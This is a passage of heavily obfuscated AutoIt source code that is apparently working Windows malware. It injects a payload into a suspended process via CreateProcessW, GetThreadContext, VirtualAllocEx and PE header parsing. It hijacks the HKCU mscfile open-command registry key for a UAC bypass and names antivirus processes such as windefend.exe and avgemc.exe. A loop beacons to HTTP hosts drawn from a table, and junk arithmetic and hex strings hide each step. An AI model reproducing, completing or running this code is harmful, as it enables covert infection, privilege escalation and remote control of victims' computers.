376. Local $sxwlnm9xofdlv7nqbbupr0bw40eljqdayzcmmdvowwu = "avkproxy.exe"
377. Return $sxwlnm9xofdlv7nqbbupr0bw40eljqdayzcmmdvowwu
378. EndFunc
379.  
380. Func bgxyyfcmeuf()
381. Return pkwphzoqwgrbylibjpvsujhsugxdiulmruppgoaeimwfdnjidy()
382. EndFunc
383.  
384. Func oluukgoeqwzedazpkiqudrgarqvbeoseuaybfuyf()
385. Return "0X50726f66696c65496d61676550617468"
386. EndFunc
387.  
388. Func oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku, $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul)
389. Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $mpodnfy6il, "ptr", $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku, "dword_ptr", $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul, "dword", 4096, "dword", ((((-1 / (0 - (-1 / -1))) + ((((64 + 0) / 4) / (-1 - (-3 / -1))) - (-1 * -2))) * ((8 / -2) + 8)) + Dec("54", 0)))
390. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
391. $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $mpodnfy6il, "ptr", $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku, "dword_ptr", $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul, "dword", 12288, "dword", (((27 - 74) - Dec("A")) + ((-2541 * 3) / -63)))
392. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError(1, 0, 0)
393. EndIf
394. Return $gwzzqtmpqf7zmwclp1y5ow17jx7g[0]
395. EndFunc
396.  
397. Func dk_vmwfymcqhofyugmhpddqxooqcvdwehwcvkmqiu()
398. Local $2pjfmncdfz2mnl3plot26cbsfwvbfcflhuxkmogydq8k9vcn1b
399. $2pjfmncdfz2mnl3plot26cbsfwvbfcflhuxkmogydq8k9vcn1b = "byte["
400. Return $2pjfmncdfz2mnl3plot26cbsfwvbfcflhuxkmogydq8k9vcn1b
401. EndFunc
402.  
403. Func rjobxxqrxdzlojrxrihhc_pwshhkcmgell_ilhndg()
404. Return '"'
405. EndFunc
406.  
407. Func qncfzvydwgstqxunvotpueu_rxayyoqh_tdytykgytbidaxl()
408. Local $ug7oa8thu5xd9ma77bad2eizh3meyp3
409. $ug7oa8thu5xd9ma77bad2eizh3meyp3 = BinaryToString("0x5C", 1)
410. Return $ug7oa8thu5xd9ma77bad2eizh3meyp3
411. EndFunc
412.  
413. Func kpknyihasguuzcnpgh_ygtofoavhpciukxvxur()
414. Return Int(@OSArch <> BinaryToString(igbeploplr_lotsclxxroi_hkaewbqnllq(), Int(ChrW(49))))
415. EndFunc
416.  
417. Func myiozsgdsx_gyqebrqytsvfmdybrwfvptytxtaofhqw()
418. Return "0x4d5a"
419. EndFunc
420.  
421. Func jydoxbdsboalqta()
422. Local $wbofp4cm5wa = ksrhwexgnbnbqvyobldkyo()
423. Return $wbofp4cm5wa
424. EndFunc
425.  
426. Func kadeezfkdnhosrk()
427. Return pcwvdlesitqrcmdjor()
428. EndFunc
429.  
430. Func necwdvikdmlps()
431. Local $ppmwfxw9ztr
432. $ppmwfxw9ztr = "/C " & "/G" & " "
433. Return $ppmwfxw9ztr
434. EndFunc
435.  
436. Func mnsufddmgkzoilpokytyaenadbrdvdzw()
437. Local $cbkz2vkdak, $my56blirmrk9mvl8h11y6nl, $7rreuxn1kzllf8ickhwzibom9xvbzf, $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = Int(ChrW(49)), $u9tamu2mnnki66xnfsc7mazzb6jj4 = 0, $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g = $tpc6yucicwgqkh24xw3ovlr34y5ylijinmmbbx50npj0ac, $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o = 0, $fz3eclo13c4hpsztvduuwn10gcs
438. While (0 - -1)
439. If $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g >= $tpc6yucicwgqkh24xw3ovlr34y5ylijinmmbbx50npj0ac Then
440. $cbkz2vkdak = _bmqdbh_ufvrqlauvcklcelaoiklndngwhaegqkha($srqtxvmgtidcu2rvvjoas5esdrgjfmwel, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][Int(Chr(51))], $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9)
441. $my56blirmrk9mvl8h11y6nl = azcwrttikodsdhmtosilqrhymexeujembbbutt("h" & "tt" & "p:/" & "/" & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][0] & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][((-1 / Dec("1")) + StringLen("JX"))], $cbkz2vkdak, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][Dec("2")])
442. If NOT @error Then
443. $7rreuxn1kzllf8ickhwzibom9xvbzf = ndxipyamhikphz($my56blirmrk9mvl8h11y6nl)
444. If IsArray($7rreuxn1kzllf8ickhwzibom9xvbzf) Then
445. If UBound($7rreuxn1kzllf8ickhwzibom9xvbzf, 2) > 0 Then
446. $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = $7rreuxn1kzllf8ickhwzibom9xvbzf[StringLen("k")][0]
447. If $7rreuxn1kzllf8ickhwzibom9xvbzf[0][0] > StringLen("?") Then
448. For $fz3eclo13c4hpsztvduuwn10gcs = Int(Chr("50")) To $7rreuxn1kzllf8ickhwzibom9xvbzf[0][0]
449. Local $0anfbfiacxx[((((0 - 1) + 0) + ((((-2 + -19) + 57) / -3) / (2 / (0 - 1)))) / Int(ChrW("49")))]
450. $0anfbfiacxx[0] = ((Dec("1") - 0) * (2 + StringLen("X")))
451. $0anfbfiacxx[Dec("1")] = ztqerabqikbldjzkht()
452. $0anfbfiacxx[Int(ChrW("50"))] = Int(Chr("49"))
453. $0anfbfiacxx[((((0 + 1) / 1) + -2) * (((-2 - 1) / -1) + -6))] = $7rreuxn1kzllf8ickhwzibom9xvbzf[$fz3eclo13c4hpsztvduuwn10gcs][0]
454. ebgjknluafaxae($7rreuxn1kzllf8ickhwzibom9xvbzf, $fz3eclo13c4hpsztvduuwn10gcs)
455. If @error Then
456. $0anfbfiacxx[((64 / -8) / (((-1 - 0) - (-3 + 0)) / -1))] = @error
457. Else
458. $0anfbfiacxx[StringLen("bFZn")] = ((1 / (((-1 + 2) / -1) + 0)) + 2)
459. EndIf
460. $cbkz2vkdak = _bmqdbh_ufvrqlauvcklcelaoiklndngwhaegqkha($0anfbfiacxx, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][(StringLen("r") * Dec("3", 0))], Int(ChrW("51")))
461. $my56blirmrk9mvl8h11y6nl = azcwrttikodsdhmtosilqrhymexeujembbbutt(qybfjbuecwngyrqo_odrnlnmwnvyppgqcfi_ie() & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][0] & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][1], $cbkz2vkdak, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][StringLen("Et")])
462. Next
463. EndIf
464. Else
465. $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = $7rreuxn1kzllf8ickhwzibom9xvbzf[((1 / -1) - ((2 - 4) - 0))]
466. EndIf
467. $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g = 0
468. Else
469. If $u9tamu2mnnki66xnfsc7mazzb6jj4 = UBound($kekmomat82cugd6sezckboynmw09zribmkpkmf7n) - Dec("1", 0) Then
470. $u9tamu2mnnki66xnfsc7mazzb6jj4 = 0
471. Else
472. $u9tamu2mnnki66xnfsc7mazzb6jj4 += Int(ChrW("49"))
473. EndIf
474. EndIf
475. Else
476. If $u9tamu2mnnki66xnfsc7mazzb6jj4 = UBound($kekmomat82cugd6sezckboynmw09zribmkpkmf7n) - 1 Then
477. $u9tamu2mnnki66xnfsc7mazzb6jj4 = 0
478. Else
479. $u9tamu2mnnki66xnfsc7mazzb6jj4 += 1
480. EndIf
481. EndIf
482. EndIf
483. If $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o >= StringLen("Tio5p1cAjbXSuJ95doFRxkPMWl6ryb") Then
484. stvqetqqbhmugrymqjlizak_yukxjp_jxbsdbc(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
485. bkmjbpjydgpjezru(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
486. mxhcfimpbgdflxo(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
487. $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o = 0
488. EndIf
489. $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g += (StringLen("2") / StringLen("M"))
490. $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o += Int(ChrW("49"))
491. xgtmdyqpzrxaz(1000000)
492. WEnd
493. EndFunc
494.  
495. Func nv_borpqgeaixjlprncpywbsgweqp()
496. Local $xvxf8xsuw9ia = "avg" & "emc." & "exe"
497. Return $xvxf8xsuw9ia
498. EndFunc
499.  
500. Func ksrhwexgnbnbqvyobldkyo()
501. Local $oksliujjvp8
502. $oksliujjvp8 = wrwejjcgkvla()
503. Return $oksliujjvp8
504. EndFunc
505.  
506. Func wkekrhvgdccunqlrxbzmvtjsrjxspmqifgazpkzvomgt()
507. Return BinaryToString("0X416464726573734F66456E747279506F696E74", 1)
508. EndFunc
509.  
510. Func ibsumghztn()
511. Return "ers;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapRes"
512. EndFunc
513.  
514. Func gmofpv_lujjeuwieyzud()
515. Local $k4vg5kugjxduuw4ith61ewgkujubz58tljuaeipeugw8
516. $k4vg5kugjxduuw4ith61ewgkujubz58tljuaeipeugw8 = "windefend.exe"
517. Return $k4vg5kugjxduuw4ith61ewgkujubz58tljuaeipeugw8
518. EndFunc
519.  
520. Func smxjfdavhanpom()
521. If IsAdmin() Then
522. RegDelete(fcylnepcxv_uzhufwnkljroccpcnsunjaluok())
523. Else
524. If RegRead("HKEY_CURRENT_USER\Software\Clas" & "ses\" & "mscfile\sh" & "ell\open\co" & "mmand", "") <> hktqydwfesogan() & @ScriptFullPath & BinaryToString("0" & "X" & "2" & "2") Then
525. RegWrite(ttdzytvstyhmtpzmkefjkuskvs(), "", bgxyyfcmeuf(), kfoafpxexzbtbwt_zlxizha() & @ScriptFullPath & ejltrmxaafxmoufziiqvmjtahjkcqjdzj_yg_jsvmbtdzaipj())
526. ShellExecuteWait(jqfjrgefxhqdfylsmemgfjelhqg(), @SW_HIDE)
527. Exit
528. Else
529. RegDelete(BinaryToString(BinaryToString("0x3078343834423435353935463433353535323532343534453534354635353533343535323543353336463636373437373631373236353543343336433631373337333635373335433644373336333636363936433635"), Int(ChrW(49))))
530. EndIf
531. EndIf
532. EndFunc
533.  
534. Func hktqydwfesogan()
535. Return '"'
536. EndFunc
537.  
538. Func vk_efwdqyrquoke()
539. Local $wet5bkuipqtvf5kipudivrjqp8eryamjpzops2yitdhta
540. $wet5bkuipqtvf5kipudivrjqp8eryamjpzops2yitdhta = "\"
541. Return $wet5bkuipqtvf5kipudivrjqp8eryamjpzops2yitdhta
542. EndFunc
543.  
544. Func fgtrgwgpfjpicdjldojqm()
545. Return "Eax"
546. EndFunc
547.  
548. Func bokfzmjaxngdfest($iypf47lbaddtzs712vsbqs4ihrz60fmjs3ksoxz1ltf8)
549. Local $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk, $ybkrjy2iz754u8yldiid
550. $ybkrjy2iz754u8yldiid = $iypf47lbaddtzs712vsbqs4ihrz60fmjs3ksoxz1ltf8 & hzey_ahlkhvhemrscd_fl()
551. If FileExists($ybkrjy2iz754u8yldiid) Then
552. $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("kernel32.dll", "bool", "DeleteFileW", "wstr", $ybkrjy2iz754u8yldiid)
553. If @error Then Return SetError(((-1 - StringLen("6")) - (-4 + 0)), @error, 0)
554. Return $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0]
555. EndIf
556. Return 0
557. EndFunc
558.  
559. Func qybfjbuecwngyrqo_odrnlnmwnvyppgqcfi_ie()
560. Local $pz5uibrldk17qmtfelmwouez
561. $pz5uibrldk17qmtfelmwouez = BinaryToString("0x687474703A2F2F", 1)
562. Return $pz5uibrldk17qmtfelmwouez
563. EndFunc
564.  
565. Func edis_boeogplxillynpbcevhtntqnzpqwo()
566. Return "Data"
567. EndFunc
568.  
569. Func omqonkueyflthfeloopqjzyytqbxa_ussbwartdhxglxxtzqp()
570. Return "rk|zo|bf|dw|tf|it|sk|vt|fj|aw|ys|he|yj|rt"
571. EndFunc
572.  
573. Func pkwphzoqwgrbylibjpvsujhsugxdiulmruppgoaeimwfdnjidy()
574. Return "REG_SZ"
575. EndFunc
576.  
577. Func qngvvwowsbiinfao_aanc_axaxtoqv_sfmnohc()
578. Return '","'
579. EndFunc
580.  
581. Func fxtypszalak_wovzpqvk_cabbwockiwvnhphgyloeyit()
582. Return RegRead(BinaryToString("0x484B45595F4C4F43414C5F4D414348494E455C48415244574152455C4445534352495054494F4E5C53797374656D5C43656E7472616C50726F636573736F725C30", 1), BinaryToString(aytbzrapgkyw()))
583. EndFunc
584.  
585. Func cweespicvbksldpwwugjuchdstxolpsea()
586. Return ",["
587. EndFunc
588.  
589. Func ttdzytvstyhmtpzmkefjkuskvs()
590. Return "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command"
591. EndFunc
592.  
593. Func wgcf_gtdxrlslmygxwlyembab($t5udnekwjnfx, $7bhptjvdhzag = "", $ignppfwlzgku6tjxj5dmcjoqmnig = @AutoItExe, $mo3sjnyun7obbbv = False)
594. Local $mbfm1yn0auxo = @AutoItX64
595. Local $epmpfdmkkkdukwm3djiz3ng5dygxz0ktlefpt = Binary($t5udnekwjnfx)
596. Local $i1zovafisbvi9eqjok7y36d6e = DllStructCreate(fxsnghepq_i() & BinaryLen($epmpfdmkkkdukwm3djiz3ng5dygxz0ktlefpt) & "]")
597. DllStructSetData($i1zovafisbvi9eqjok7y36d6e, (Int(Chr("49")) / (0 - (-1 / 1))), $epmpfdmkkkdukwm3djiz3ng5dygxz0ktlefpt)
598. Local $ohug55t6wkqrzcywe8 = DllStructGetPtr($i1zovafisbvi9eqjok7y36d6e)
599. Local $5cp642et6jmjqly4od4gqms4 = DllStructCreate(BinaryToString(hins_xsbpamdjm()))
600. Local $lvex13kltf6ptj = DllStructCreate("ptr Proce" & "ss;pt" & "r Thr" & "ead;dw" & "ord ProcessId;dw" & "ord ThreadId")
601. If $mo3sjnyun7obbbv = False Then
602. Local $0kcupzxrotvibhw8htfx = StringLen("WiHx")
603. Else
604. Local $0kcupzxrotvibhw8htfx = 4 + 8
605. EndIf
606. Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $ignppfwlzgku6tjxj5dmcjoqmnig, "wstr", $7bhptjvdhzag, "ptr", 0, "ptr", 0, "int", 0, "dword", $0kcupzxrotvibhw8htfx, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($5cp642et6jmjqly4od4gqms4), "ptr", DllStructGetPtr($lvex13kltf6ptj))
607. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError((((1 / Dec("1", 0)) + 0) / -1), 0, 0)
608. Local $mpodnfy6il = DllStructGetData($lvex13kltf6ptj, esmvok_rkimdmtlhorftuvvulz_dbkiprijvximo_qjpenkiso())
609. Local $gk43ktboa7b = DllStructGetData($lvex13kltf6ptj, BinaryToString("0X546872656164"))
610. If $mbfm1yn0auxo AND gskybmwosfhcjgxfghszalc($mpodnfy6il) Then
611. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
612. Return SetError((Dec("1") + (-1 * 3)), 0, 0)
613. EndIf
614. Local $jbkokjcudb2o5m8caztuwg2owxt1a5oc0, $bbldic83pit5sf
615. If $mbfm1yn0auxo Then
616. If @OSArch = mq_ttlrxgpmqogskxroyqvwm_bdzggb() Then
617. $jbkokjcudb2o5m8caztuwg2owxt1a5oc0 = Int(Chr("50"))
618. $bbldic83pit5sf = DllStructCreate(BinaryToString(BinaryToString("0x307836313663363936373665323033313336336232303735363936653734333633343230353033313438366636643635336232303735363936653734333633343230353033323438366636643635336232303735363936653734333633343230353033333438366636643635336232303735363936653734333633343230353033343438366636643635336232303735363936653734333633343230353033353438366636643635336232303735363936653734333633343230353033363438366636643635336236343737366637323634323034333666366537343635373837343436366336313637373333623230363437373666373236343230346437383433373337323362373736663732363432303533363536373433353333623230373736663732363432303533363536373434373333623230373736663732363432303533363536373435373333623230373736663732363432303533363536373436373333623230373736663732363432303533363536373437373333623230373736663732363432303533363536373533373333623230363437373666373236343230343534363663363136373733336237353639366537343336333432303434373233303362323037353639366537343336333432303434373233313362323037353639366537343336333432303434373233323362323037353639366537343336333432303434373233333362323037353639366537343336333432303434373233363362323037353639366537343336333432303434373233373362373536393665373433363334323035323" & "6313738336232303735363936653734333633343230353236333738336232303735363936653734333633343230353236343738336232303735363936653734333633343230353236323738336232303735363936653734333633343230353237333730336232303735363936653734333633343230353236323730336232303735363936653734333633343230353237333639336232303735363936653734333633343230353236343639336232303735363936653734333633343230353233383362323037353639366537343336333432303532333933623230373536393665373433363334323035323331333033623230373536393665373433363334323035323331333133623230373536393665373433363334323035323331333233623230373536393665373433363334323035323331333333623230373536393665373433363334323035323331333433623230373536393665373433363334323035323331333533623735363936653734333633343230353236393730336237353639366537343336333432303438363536313634363537323562333435643362323037353639366537343336333432303463363536373631363337393562333133363564336232303735363936653734333633343230353836643664333035623332356433623" & "2303735363936653734333633343230353836643664333135623332356433623230373536393665373433363334323035383664366433323562333235643362323037353639366537343336333432303538366436643333356233323564336232303735363936653734333633343230353836643664333435623332356433623230373536393665373433363334323035383664366433353562333235643362323037353639366537343336333432303538366436643336356233323564336232303735363936653734333633343230353836643664333735623332356433623230373536393665373433363334323035383664366433383562333235643362323037353639366537343336333432303538366436643339356233323564336232303735363936653734333633343230353836643664333133303562333235643362323037353639366537343336333432303538366436643331333135623332356433623230373536393665373433363334323035383664366433313332356233323564336232303735363936653734333633343230353836643664333133333562333235643362323037353639366537343336333432303538366436643331333435623" & "332356433623230373536393665373433363334323035383664366433313335356233323564336237353639366537343336333432303536363536333734366637323532363536373639373337343635373235623335333235643362323037353639366537343336333432303536363536333734366637323433366636653734373236663663336237353639366537343336333432303434363536323735363734333666366537343732366636633362323037353639366537343336333432303463363137333734343237323631366536333638353436663532363937303362323037353639366537343336333432303463363137333734343237323631366536333638343637323666366435323639373033623230373536393665373433363334323034633631373337343435373836333635373037343639366636653534366635323639373033623230373536393665373433363334323034633631373337343435373836333635373037343639366636653436373236663664353236393730"), (((1 - 0) + -2) + (1 * 2))))
619. Else
620. $jbkokjcudb2o5m8caztuwg2owxt1a5oc0 = Dec("3", 0)
621. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
622. Return SetError((3 * (17 * (2 / -1))), 0, 0)
623. EndIf
624. Else
625. $jbkokjcudb2o5m8caztuwg2owxt1a5oc0 = ((Dec("1") / (-1 + 0)) + 2)
626. $bbldic83pit5sf = DllStructCreate(BinaryToString(BinaryToString(cgyaodzdyfzpzytflyedsdstcmvgxetfciaszc(), ((Int(Chr("49")) / (((Int(ChrW("49")) - 2) - (((-2 / (0 + ((1 / -1) / 1))) + -4) - 0)) + (-1 - (0 - -1)))) - (-1 * 2))), ((1 - 0) + 0)))
627. EndIf
628. Local $8opxvjba9oa0n6pepmdk4fdq
629. Switch $jbkokjcudb2o5m8caztuwg2owxt1a5oc0
630. Case StringLen("t")
631. $8opxvjba9oa0n6pepmdk4fdq = 65543
632. Case Int(ChrW("50"))
633. $8opxvjba9oa0n6pepmdk4fdq = 1048583
634. Case StringLen("TQZ")
635. $8opxvjba9oa0n6pepmdk4fdq = 524327
636. EndSwitch
637. DllStructSetData($bbldic83pit5sf, bhdbndvdmngzjiwrafcrnttuviznobqoluwjkgnigeils(), $8opxvjba9oa0n6pepmdk4fdq)
638. $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $gk43ktboa7b, "ptr", DllStructGetPtr($bbldic83pit5sf))
639. If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
640. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
641. Return SetError((StringLen("8R") + (-25 / 5)), 0, 0)
642. EndIf
643. Local $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr
644. Switch $jbkokjcudb2o5m8caztuwg2owxt1a5oc0
645. Case Int(Chr(49))
646. $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr = DllStructGetData($bbldic83pit5sf, "E" & "b" & "x")
647. Case ((Dec("1", 0) - ((0 - 2) + 4)) - (StringLen("K") * (0 + ((1 * ((0 + -1) - (-1 / -1))) + -1))))
648. $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr = DllStructGetData($bbldic83pit5sf, "R" & "dx")
649. EndSwitch
650. Local $r8vggbyuuyurnalrp4xix4vr79wh9lnphqfc = DllStructCreate(BinaryToString(BinaryToString("0x3078363336383631373232303464363136373639363335623332356433623737366637323634323034323739373436353733346636653463363137333734353036313637363533623737366637323634323035303631363736353733336237373666373236343230353236353663366636333631373436393666366537333362373736663732363432303533363937613635366636363438363536313634363537323362373736663732363432303464363936653639366437353664343537383734373236313362373736663732363432303464363137383639366437353664343537383734373236313362373736663732363432303533353333623737366637323634323035333530336237373666373236343230343336383635363336623733373536643362373736663732363432303439353033623737366637323634323034333533336237373666373236343230353236353663366636333631373436393666366533623737366637323634323034663736363537323663363137393362363336383631373232303532363537333635373237363635363435623338356433623737366637323634323034663435346434393634363536653734363936363639363537323362373736663732363432303466343534643439366536363666373236643631373436393666366533623633363836313732323035323635373336353732373636353634333235623332333035643362363437373666373236343230343136343634373236353733373334663636346536353737343537383635343836353631363436353732"), (-1 / -1)), $ohug55t6wkqrzcywe8)
651. Local $dbq90hhmy9udn0gcdyuunqrcbf3ixuu2 = $ohug55t6wkqrzcywe8
652. $ohug55t6wkqrzcywe8 += DllStructGetData($r8vggbyuuyurnalrp4xix4vr79wh9lnphqfc, BinaryToString(kjavlascotfsjjcnqepcvvftdcdqrkxyofgnmgnwmtobtwifw(), 1))
653. Local $vdfnldk3i2wdiat7hftzoimszw5l8altkqcyq7uqj82vtfr5h = DllStructGetData($r8vggbyuuyurnalrp4xix4vr79wh9lnphqfc, smtocknhnytfzkdktgmccdh())
654. If NOT ($vdfnldk3i2wdiat7hftzoimszw5l8altkqcyq7uqj82vtfr5h == BinaryToString(myiozsgdsx_gyqebrqytsvfmdybrwfvptytxtaofhqw(), (((1 - 0) + (0 + -2)) + (0 + (-2 + 4))))) Then
655. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
656. Return SetError(-4, 0, 0)
657. EndIf
658. Local $zlf3i9mepibrdkh3jdyuknqdihshcg2x3 = DllStructCreate(BinaryToString("0x64776F7264205" & "369676E61747572" & "65", Int(ChrW("49"))), $ohug55t6wkqrzcywe8)
659. $ohug55t6wkqrzcywe8 += (((((StringLen("z") - 0) - Dec("2")) + (Int(Chr(52)) / 2)) * ((Dec("2", 0) + -5) - 0)) - -7)
660. If DllStructGetData($zlf3i9mepibrdkh3jdyuknqdihshcg2x3, BinaryToString(sdzvmsjsjepebalxyzamymrnjpzltpexiivwmoji())) <> Dec("4550") Then
661. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
662. Return SetError((Dec("14", 0) / (-12 / Dec("3", 0))), 0, 0)
663. EndIf
664. Local $fxkopwnqjcgjapiiyfwijnqdut = DllStructCreate(BinaryToString("0X776f7264204d616368696e653b776f7264204" & "e756d6265724f6653656374696f6e733b647" & "76f72642054696d65446174655374616d703b64776f726420506f696e746572546f53796d626f6c5461626c653b6" & "4776f7264204e756d6265724f6653796d626f6c733b776f72642053697a654f664f7074696f6e616c4865616465723b776f7264204368617261637465726973746" & "96373"), $ohug55t6wkqrzcywe8)
665. Local $fpim71aquxa3tneqfcvmw5 = DllStructGetData($fxkopwnqjcgjapiiyfwijnqdut, "Nu" & "mber" & "Of" & "Sectio" & "ns")
666. $ohug55t6wkqrzcywe8 += (-140 / -7)
667. Local $s4vy6gbnfowssp8ap0zowjkqvpwqwcf2ispms93tm = DllStructCreate(ytfojlx_kruklwmhosdufnetruxxriwje(), $ohug55t6wkqrzcywe8)
668. Local $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = DllStructGetData($s4vy6gbnfowssp8ap0zowjkqvpwqwcf2ispms93tm, 1)
669. Local $g8f8je6pbziltsqw5knrzmgj
670. If $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = (((Dec("5FD", 0) + (-44 * ((-5149 / 19) - ((((-1 * (-2 - 4)) - (((10 / (-1 * 2)) + ((-4 / (Dec("4") / -2)) + 10)) * StringLen("ov"))) * (0 - -2)) - -52)))) * (0 + -3)) / (24167 / (8008 / (616 / (-1 * (-1 * (110 / -10))))))) Then
671. If $mbfm1yn0auxo Then
672. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
673. Return SetError((Int(Chr("51")) + -9), 0, 0)
674. EndIf
675. $g8f8je6pbziltsqw5knrzmgj = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUni" & "nitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dwo" & "rd BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorIm" & "ageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword S" & "izeOfHead" & ibsumghztn() & "erve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $ohug55t6wkqrzcywe8)
676. $ohug55t6wkqrzcywe8 += Dec("60")
677. ElseIf $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = (((Dec("34", 0) + -127) * ((0 - ((Int(Chr("49")) + -2) / Dec("1", 0))) + (-4 - -8))) - -898) Then
678. If NOT $mbfm1yn0auxo Then
679. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
680. Return SetError(((-1 + (4 - 15)) / Int(Chr("50"))), 0, 0)
681. EndIf
682. $g8f8je6pbziltsqw5knrzmgj = DllStructCreate(fqvyfwcsqpxyfdtcwtjwoztevhzv(), $ohug55t6wkqrzcywe8)
683. $ohug55t6wkqrzcywe8 += (((3 - -4) + -23) * (-1 * (2 + 5)))
684. Else
685. DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
686. Return SetError((((1 - (2 / Int(ChrW("49")))) + (0 + 2)) - StringLen("-17CGI0")), 0, 0)
687. EndIf
688. Local $zuinpjpxoem5ozdk2fmoujsnly2lma34v2voq5atmkqm = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, wkekrhvgdccunqlrxbzmvtjsrjxspmqifgazpkzvomgt())
689. Local $kmqdusdqnhmsmalt7rg = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, BinaryToString(jepxrkcfuyrxzfsmmbnhng()))
690. Local $dcda6qowuym57zfqucadzu = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, "I" & BinaryToString("0x6d" & "6" & "16" & "7", Dec("1", 0)) & "eBas" & "e")
691. Local $rqr75skrbzzbitd4vhr = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, wfynrtnxvldsaqsxxxjvingsuonfhpzclgygl())
692. $ohug55t6wkqrzcywe8 += 8
693. $ohug55t6wkqrzcywe8 += Int(ChrW(56))
694. $ohug55t6wkqrzcywe8 += ((((-25 + 229) - 434) - Dec("6A")) / (-12 + (0 + (-1 + -1))))
695. Local $beofbo3ndcgq7rjtgmlp = DllStructCreate("dw" & "ord" & BinaryToString("0X205669") & "r" & BinaryToString("0x747561") & "lA" & "ddres" & "s" & "; dword Siz" & "e", $ohug55t6wkqrzcywe8)
696. Local $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech = DllStructGetData($beofbo3ndcgq7rjtgmlp, BinaryToString(BinaryToString("0X305835363639373237343735363136633431363436343732363537333733", Int(ChrW("49"))), 1))
697. Local $wkkz3rasb01j = DllStructGetData($beofbo3ndcgq7rjtgmlp, joudnyrrydhvjpqr_qbpophdiyevazz_yvvdzrjtzr())
698. Local $yjpgyvsyamgsnrwji
